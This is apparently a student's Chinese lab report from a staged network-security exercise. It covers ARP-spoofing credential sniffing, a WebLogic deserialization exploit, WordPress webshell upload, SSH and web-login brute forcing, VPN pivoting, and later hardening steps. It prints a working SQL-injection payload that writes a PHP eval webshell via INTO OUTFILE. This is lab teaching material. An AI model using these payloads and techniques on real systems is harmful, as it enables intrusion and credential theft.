+++
title = "Ex8"
date = 2022-05-21
categories = ["网络安全实验"]
draft = false
author = "Logic"
+++

## 实验过程 {#实验过程}


### 实验一 {#实验一}

打开wireshark，将test1.cap包拖入wireshark中，可以在数据包中发现如下信息

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520KOiITt.png" >}}

可见192.168.1.4主机开启了ftp服务，且192.168.1.3主机会访问192.168.1.4主机的ftp服务并进行其他操作。我们打开ettercap。扫描主机列表，可以看到192.168.1.3主机和192.168.1.4主机，我们分别将其加入target1和target2，并开始中间人攻击，使用ARP欺骗，一段时间后可以看到截取到了ftp的登录用户名和密码，如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520F9QaTr.png" >}}

用户名为simple，密码为simple123，登录到192.168.1.4的ftp服务器，并查看文件得到

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520cS8tdI.png" >}}

则将key.txt文件下载到了操作机，我们在操作机终端查看文件内容为centos linux

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520es3ldc.png" >}}

继续查看cap文件，在wireshark中过滤，将数据包的目标ip设置为192.168.1.4，查看过滤出来的数据包，可以发现

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520Uh4lvv.png" >}}

则192.168.1.4主机开启了7001端口，有可能使用了weblogic服务，我们使用nmap扫描一下对应的端口存在的服务，如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520KGcE2p.png" >}}

可以发现在使用weblogic服务且启用了T3协议。且版本为12.1.3，故存在反序列化漏洞，使用漏洞利用脚本连接到192.168.1.4主机上并获取shell，查找key1.txt文件的路径如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520UnycvC.png" >}}

查看文件内容为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520dqa6fO.png" >}}

可知文件内容为hello


### 实验二 {#实验二}

打开wireshark，将test2.cap拖入wireshark中，查看数据包中的数据

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/052022K5Se.png" >}}

可知192.168.1.5主机在80端口开启了web服务，浏览器访问该网站，给出了该网站的目录，可以看到存在key2.txt文件，直接访问该文件

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05205nzCPx.png" >}}

则key2.txt中的信息为admin888
打开wordpress后台登录界面，则尝试使用用户名admin，密码admin888登录，登陆成功，写一个一句话木马，名为shell.php

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524E0M4Bd.png" >}}

在wordpress的安装插件部分可以看到我们可以上传插件进行安装。但是要上传zip格式的插件文件。故我们将刚才生成的文件压缩成zip包的格式，然后上传。

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05247XBRhj.png" >}}

上传后查看媒体库，可见有我们上传的shell.zip文件，这说明虽然显示插件安装失败，但是文件仍然被上传到了服务器。我们可以尝试访问这个文件，这里要访问的路径是/wp-content/upgrade/，如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524qxqObf.png" >}}

打开菜刀，连接到shell

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524f712XT.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524i9TDFe.png" >}}

在菜刀中打开虚拟终端，修改管理员密码为xipu.123

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524MpSbBH.png" >}}

使用rdesktop登录到远程主机

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05240Vo1U7.png" >}}

查看C盘下的username.txt为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524d4CwT3.png" >}}

可知192.168.1.6主机的登录用户名为root，密码为hacker\*\*\*。


### 任务三 {#任务三}

使用crunch命令，生成密码结构为hacker\*\*\*的密码文件，命名为passwd.txt。

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524Zmxog7.png" >}}

使用hydra对目标主机进行ssh爆破，如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524sa4S61.png" >}}

可知密码为hacker427，登录目标机，查看网卡配置信息

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524XaRBqO.png" >}}

则eth1网卡所在的网段为192.168.2.0/24。使用nmap扫描该网段，为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524EVvjlA.png" >}}

则可知存活主机有 192.168.2.3、192.168.2.10、192.168.2.2，扫描两台主机的端口得到

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524yBkb95.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524hadskt.png" >}}

则可知192.168.2.3主机上存在
http服务。进入根目录，可以看到key3.txt文件

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524JylNyn.png" >}}

查看文件内容为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524fgG6FL.png" >}}


### 任务四 {#任务四}

使用ftp登录192.168.1.4，前面实验已经获得该主机的用户名为simple，密码为simple123，查看ftp服务器上的文件，将openvpn.zip下载下来

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524hyx2A0.png" >}}

使用scp将openvpn.zip上传到目标主机192.168.1.6，如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524CJAPsR.png" >}}

使用ssh登录目标主机192.168.1.6，查看目录下的openvpn.zip文件

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524B3xrYI.png" >}}

解压并安装，命令为

```shell
unzip openvpn.zip
cd openvpn
yum localinstall
```

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05249VWjFI.png" >}}

安装成功，将openvpn的模板配置文件拷贝到配置文件目录即/etc/openvpn下，接着修改server.conf配置文件配置本地监听IP地址

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524nrHBoQ.png" >}}

配置静态路由注入

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524jvNfYJ.png" >}}

配置网关转发

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524qHtMwn.png" >}}

配置DNF地址

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05244mXPTq.png" >}}

配置运行用户以及用户组为nobody

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524V9e36t.png" >}}

接下来准备配置证书，将easy-rsa拷贝到openvpn目录下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524KfETzT.png" >}}

修改配置文件中的环境变量，并使用source命令使修改生效

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05241yERJJ.png" >}}

生成CA证书，如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524x2juKG.png" >}}

创建服务端证书

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0524PYqGzl.png" >}}

生成防攻击的 key 文件, 可用于防 DDos 攻击、UDP 淹没等恶意攻击

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05255RzLhq.png" >}}

创建DH密钥

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525JOZeQJ.png" >}}

拷贝密钥认证文件到配置文件目录下，创建客户端证书

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05255ATb7O.png" >}}

centos系统安装好后运行于主机模式，并没有开启包转发功能。即系统只处理目的地为本机的数据包，不会转发发往其他地址的数据包。在内核中有相应配置选项net.ipv4.ip_forward默认设置为0。可以通过命令sysctl net.ipv4.ip_forward=1手动开启包转发功能。防火墙的masquerade功能进行地址伪装（NAT），私网访问公网或公网访问私网都需要开启此功能来进行地址转换，否则无法正常互访。配置防火墙，允许其通过 openvpn 服务

```shell
systemctl start firewalld //开启防火墙
firewall-cmd --add-service openvpn //允许通过openvpn
firewall-cmd --permanent --add-service openvpn
firewall-cmd --list-services //查看防火墙允许的服务
```

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525DNyff8.png" >}}

给防火墙添加地址转换策略和IP转发功能

```shell
firewall-cmd --add-masquerade
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf //修改内核配置文件，开启转发
sysctl -p   //使生效
```

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05255Whted.png" >}}

启动openvpn服务

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525rLNDov.png" >}}

从主机 192.168.1.6 中下载 ca.crt、client.crt、client.key、ta.key 到操作机的/home/Hack/ca 目录下

```shell
scp root@192.168.1.6:/etc/openvpn/easy-rsa/2.0/keys/ca.crt ca/
scp root@192.168.1.6:/etc/openvpn/easy-rsa/2.0/keys/client.crt ca/
scp root@192.168.1.6:/etc/openvpn/easy-rsa/2.0/keys/client.key ca/
scp root@192.168.1.6:/etc/openvpn/easy-rsa/2.0/keys/ta.key ca/
```

解压 openvpn.zip 并将install.exe 安装文件 复制到 ca 文件夹下，使用 rdesktop 命令远程登录主机 192.168.1.5，根据前面的实验，我们的用户名为 administrator，密码为 xipu.123，同时我们要将操作机的ca文件夹挂载到目标机器上，因此远程登录的命令为：

```shell
rdesktop 192.168.1.5 -u administrator -p Pzx8888 -r disk:h=/home/Hack/ca
```

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525zCuYdw.png" >}}

在目标机上安装openvpn

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525kj8c0Y.png" >}}

拷贝证书到openvpn的config目录下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525bfDQTC.png" >}}

编辑客户端的配置文件client.ovpn并运行

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525hr1Xv4.png" >}}

运行 ipconfig 命令可以看到本地连接5分配到 IP 地址

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525HvawiV.png" >}}

查看路由表

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525SbspbS.png" >}}

使用 openvpn 分配的IP地址，我们可以成功访问主机 192.168.2.3 的web服务

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525xoWQ2d.png" >}}

我们在操作机上先通过 ftp 登录主机 192.168.1.4，将wwwscan下载到本机

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525MV7hZz.png" >}}

将该工具复制到 /home/Hack/ca 中，此时在主机 192.168.1.5的h盘可以看到安装文件：

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525TYdXkq.png" >}}

接下来使用其中的 wwwscan 工具对目标网站进行扫描：

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525OeiCHt.png" >}}

根据扫描结果我们猜测该网站的登录界面链接为 192.168.2.3/manager/login.php

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/052524JraY.png" >}}

访问该链接，成功进入界面

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525ve8c0X.png" >}}

设置 burpsuite 和浏览器的代理，随意输入用户名和密码登录并抓包，获取报文格式。

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525LKv9N7.png" >}}

在action选择“send to intruder”，并将密码pwd设置为要破解的变量，用户名我们直接用 admin

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525jdUlfF.png" >}}

设置好密码字典文件，开始爆破

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525zZjqJz.png" >}}

根据爆破结果的长度不同，得到登录密码为：1q2w3e4r

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525KgSbxE.png" >}}

登录后台界面，在文件式管理器中找到 key04.txt，查看其内容

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525qcOn1f.png" >}}

利用 sql 注入漏洞上传一句话木马，根据之前实验内容学到的，将密码内容写为16进制存放，则应访问的地址为

>
>
> <http://192.168.2.3/sql/?id=1> UNION SELECT 1,2,3,4,5,6,7,8,9,0x3c3f706870206576616c28245f504f53545b636d645d293b3f3e into outfile /var/www/html/shell2.php

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525nB0dGU.png" >}}

写入成功，使用菜刀连接到目标机器

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525eTuPf3.png" >}}

在网站根目录下找到key4.txt，查看文件内容

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05251acuXm.png" >}}


### 任务五 {#任务五}

通过 ssh 命令远程登录目标主机 192.168.1.4的 root 用户

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525pBkxZG.png" >}}

使用 ifconfig 命令查看主机的MAC地址

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525EkendP.png" >}}

使用 rdesktop 命令远程登录主机 192.168.1.3，执行 ipconfig /all 命令，查看主机的MAC地址

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525AQ6PUD.png" >}}

接下来在主机 1.4 上添加主机 1.3的 ip-mac 映射

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525Armp6D.png" >}}

接下来在主机 1.3 上添加静态 arp 项

```bash
netsh -c "i i" add neighbors 12 "192.168.1.4" " FA-16-3E-03-9A-BC"
```

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525gnpwZ4.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525wiAPpa.png" >}}

可以发现192.168.1.4对应的arp表项已经是静态类型在绑定静态 arp 前我们先进行一次嗅探，可以成功得到数据，因为会通过arp欺骗告知192.168.1.3目标主机错误的MAC地址（实际为192.168.1.2）即攻击机的MAC地址。

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05258aVKFQ.png" >}}

绑定后再次进行嗅探，无法得到数据，因为192.168.1.4的MAC地址已经被静态指定了，arp欺骗无法生效。

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05252TiITX.png" >}}


### 任务六 {#任务六}

登录主机 192.168.1.5 的wordpress 网站，用户名 admin，密码 admin8888，在主页的“设置”选项中看到用户可以修改自己的密码，且用户 admin 的邮箱为 1@qq.com。

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525qeP5bO.png" >}}

将用户密码修改为@aa233A!!322

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525aA2tMm.png" >}}

可见密码强度为强修改192.168.2.3机器dedecms网站后台管理员admin的用户名，在该网站中我们采用数据库替换功能直接修改数据库的用户数据来实现用户名的更改

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525LbrXi5.png" >}}

这里将用户名改为animotion
再修改网站后台地址，将manager改为admin

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525Sl0zxa.png" >}}

再次访问，可以发现修改过后原网页的url发生了变化

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525TMp9fv.png" >}}

此外也可以在菜刀中对文件名进行修改，修改完后刷新dedecms即可发现url发生了变化，结果是一样的。


### 任务七 {#任务七}

在先前的任务中我们已经发现，织梦的后台文件管理文件sql中，存在可以sql注入的文件/sql/index.php，查看该文件，则得知过滤规则为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525Vq7xCc.png" >}}

尽管如此，过滤还是不够全面，仍然存在漏洞，为修改这些漏洞，我们可以使用函数mysql_real_escape_string 来转移特殊字符集，本函数将 string 中的特殊字符转义，并考虑到连接的当前字符集，因此可以安全用于 mysql_query()。在网站接收到查询时先过滤变量 $id   $id=mysql_real_escape_string($id);

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525eKKN6N.png" >}}

修改后再次执行之前的 sql 注入语句，发现执行失败

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525Z6Yy5u.png" >}}

在之前的任务中我们已知，主机 192.168.1.6 的用户 root 的密码属于弱密码，所以我们登录 root 用户后修改密码为awm2333!

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0525ZJtW5Z.png" >}}
